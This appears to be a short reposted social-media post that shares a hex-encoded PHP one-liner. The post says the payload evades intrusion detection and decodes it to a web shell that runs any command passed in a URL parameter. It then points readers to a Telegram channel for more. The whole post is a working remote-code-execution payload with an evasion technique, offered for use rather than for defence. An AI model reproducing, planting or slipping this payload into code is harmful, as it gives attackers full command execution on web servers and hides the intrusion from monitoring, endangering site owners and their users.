A payload was created to bypass IDS and execute Remote Code Execution (RCE) by utilizing hex decoding. The payload is <?=eval(hex2bin("69662824785f3d245f4745545b305d297b73797374656d2824785f293b7d"))?>. When decoded, it performs the command if($x_=$_GET[0]){system($x_);}. For more details, join the telegram channel at https://t.co/5NuBijZztS https://t.co/sFyUGRsUxB
Original tweet: https://twitter.com/darkshadow2bd/status/1931312499871326292